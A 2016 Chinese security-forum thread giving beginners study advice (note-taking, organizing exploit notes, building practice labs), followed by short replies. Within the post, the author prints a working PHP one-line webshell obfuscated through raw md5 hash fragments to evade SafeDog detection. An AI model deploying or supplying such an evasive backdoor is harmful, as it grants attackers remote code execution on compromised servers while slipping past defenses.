请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 823|回复: 11

[原创文章] 致初学者

[复制链接]
  • TA的每日心情
    擦汗
    2016-8-5 00:12
  • 签到天数: 14 天

    [LV.3]偶尔看看II

    发表于 2016-8-7 16:21:13 | 显示全部楼层 |阅读模式
    本来这篇文章是投到(301在路上)微信公众号的,可能是内容不丰富吧就没有过,也花费了3个多小时才写出的,原稿贴上吧,大牛勿喷!没推广SSS论坛成功。。。。

    -----------------------------------------------------------------------------------------------------------
    给初学者的建议
    先自我介绍一下,我是SSS安全团队的核心成员,IDAugus 。现实中我是一名程序猿。
    为什么写这篇文章呢?主要是因为我看到过太多太多初学者不知道怎样去学习技术,可以说是没有清晰的学习思路,所以我想把我的经验写出来,分享给大家。
    我本人是深有体会的,当初从一点都不懂到后来想好好学习技术,在这段过程中,我曾经不明白为什么自己学不会?看那些大牛的视频也很多,但是在动手实践中遇到问题了我整个人都懵逼了,不知道从哪里下手。后来经过长时间的实战训练和摸索,大概总结出了以下几点。
    (我总结的学习思路,跟渗透的基本步骤是差不多的。)
    QQ截图20160807161753.png
    信息收集:好记性不如烂笔头。
    每次学习完一样东西以后,或者自己理解了一样东西以后,可以试着用电脑或者笔记本记下来,自己做一个总结加深自己的印象,做一个资料整理。我现在就是这么做的,每天到公司的第一件事情,先初步的列出今天要的事情,今天有什么计划?晚上下班的时候打开早上写的文档,做出总结。今天的完成度是否达到自己的标准。
    资料整合:自己做的总结或者记下来的笔记,这些东西再次精炼出来到最后你会发现都是精华。
    大牛为什么能写工具?一个人真的能记得那么多通用系统的漏洞吗?一个人真的能记住那么多的sql注入语句吗?我不是一个聪明的人,我记不住,所以我会分类去做好笔记。
    是否是通用的CMS:笔记的归类,如何归类其实也是有方法的。
    我自己归类的结构:视频笔记----代码审计笔记----基本注入语句----通用漏洞----xsspass----其他总结等等。
    EXP/POC:资料归档是否清晰易找。
    在我学习之初,写的笔记在需要用到的时候就找不到了,印象中是有记录的,可是因为没有做好分类整理,压根找不到记录在哪里了。遇到这样的时候就很郁闷,每个人都有每个人的分类方式,但无论怎么去整理,自己都要清晰的知道自己笔记是记在哪里的。
    光学不练也不行,但是渗透环境怎么办呢?我建议自己装虚拟机,在网上下载源码自己搭建测试环境这个是非常重要的。PHP,JSP,aspx网站环境等等。不仅仅是常规练手,也是为代码审计做出准备。
    很多初学者会有疑问不会编程可以吗?
    其实最好还是要学一门语言的,语言之间的互通性是有的,可以做到看懂代码,能写一些EXP,工具,代码审计。前期编程不会就可以学渗透理论,看一下CTF的题目,锻炼一下思维能力,再去慢慢学编程会快很多,我建议学一门语言是最好。
    网站结构分析:做事情之前先规划好思路。
    给你一件事情,不要马上去操作,自己可以先想一下整个事情的思路流程,一些节点以及事情最终失败的后果等等。在我刚工作的时候,我们产品经理跟我讲完一个功能流程,我自己就会快速开发,开发到中途的时候才发现,根本不是我想的那个样子。站在开发角度上来说,就是要多反问自己,为什么要做这个功能?怎么做好这个功能?这个功能会影响的到别的功能点吗?做这个流程的风险是有多大?说白了就是流程拆解成一小块一小块。
    我刚学技术的时候,想着我看完某个大牛的全套教材以后我要成为什么样NB的人,现实会告诉你理想很伟大现实很残酷,但是我把大牛的本事拆成不同的几个小部分,慢慢一步一步的去实现,每个时间段都会有成就感!有动力!不至于迷茫。
    弱口令:换位思考,多与人交流。
    把别人的思路尝试着转换成自己的思路,我经常在SSS论坛看原创帖跟渗透实战,原创版本里面有杀软绕过集合贴,我对php一句话免杀是没有尝试过的,因为我对PHP不太熟。
    别人能写的我为什么不能写,我决定尝试一下,我把免杀贴看完,网上查了些资料,初步知道安全狗是对关键字排查等等。脑海冒出一个淫技,源自于补天在上海开峰会的时候,SSS团队出了一道CTF题,第二个登录验证提示了你知道md5第二个函数是干嘛的?不知道问度娘,我给出我大概的理解:字符串->MD5->进行反转  就会变成特殊字符。
    我进行尝试echo hash("md5","f", true); 结果: ??L?uO??eT??)?? 那就动手反推出一句话木马。
    目标:assert($_POST['Augus']);
    结果:<?php
    $c=substr(hash("md5","e", true),-3,1).substr(hash("md5","'", true),-2,1).substr(hash("md5","'", true),-2,1).substr(hash("md5","e", true),-5,1).substr(hash("md5",";", true),-6,1).substr(hash("md5","f", true),-7,1);
    $c($_POST['Augus']);
    ?>
    步骤:利用反转出来的字符串->截取->拼装   果然免杀。
    看书或者看教程的时候,你可以想象如果你是作者,现在你会怎么做,生活中做人做事都需要换位思考,因为每个人的思路都是不一样,分享交流以后,你总归会学到一些知识。


    总结:不疯魔不成活。自己喜欢的东西你不拼,你什么都不会有,你拼了,就有50%的机会。很多事情,需要去尝试。找到一个适合自己的学习方法,才能事半功倍。我也是从什么都不会到现在会自己学,会自己总结,这个过程是充实快乐的,但是最重要的还是坚持!
    既然选择了远方,便只顾风雨兼程!
    SSS论坛地址:http://bbs.sssie.com/
    千人交流群:519227140
    欢迎志同道合的大神,想学习的初学者,想交流的朋友,来分享自己的技术。 



    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    昨天 13:27
  • 签到天数: 295 天

    [LV.8]以坛为家I

    发表于 2016-8-7 16:24:57 | 显示全部楼层
    在送大家一张图,还有就是灌水会被封号哦!

    windows下的黑客路线图(编程篇).png

  • TA的每日心情
    擦汗
    昨天 08:37
  • 签到天数: 420 天

    [LV.9]以坛为家II

    发表于 2016-8-7 21:59:04 | 显示全部楼层
    :)内容不错,感谢分享
  • TA的每日心情
    奋斗
    2016-9-9 16:05
  • 签到天数: 41 天

    [LV.5]常住居民I

    发表于 2016-8-8 08:24:20 | 显示全部楼层
    什么时候能看大神们在直播中渗透个网站就好了    小白们表示想张张眼界
  • TA的每日心情
    奋斗
    2016-10-10 09:02
  • 签到天数: 44 天

    [LV.5]常住居民I

    发表于 2016-8-8 09:15:53 | 显示全部楼层
    学习一下
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2016-10-10 09:02
  • 签到天数: 44 天

    [LV.5]常住居民I

    发表于 2016-8-8 09:16:04 | 显示全部楼层
    学习一下
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2016-9-6 09:05
  • 签到天数: 34 天

    [LV.5]常住居民I

    发表于 2016-8-8 09:37:51 | 显示全部楼层
    道阻且艰 不能停!:)
  • TA的每日心情
    擦汗
    2017-1-1 13:23
  • 签到天数: 41 天

    [LV.5]常住居民I

    发表于 2016-8-8 09:38:05 | 显示全部楼层
    顶一下
    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2016-11-16 21:43
  • 签到天数: 27 天

    [LV.4]偶尔看看III

    发表于 2016-8-8 09:47:30 | 显示全部楼层
    这个不错,给新人一些学习思路:D
  • TA的每日心情
    开心
    2016-8-18 17:50
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2016-8-10 16:01:46 | 显示全部楼层
    学习了--
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-1-21 06:04 , Processed in 0.185353 second(s), 39 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表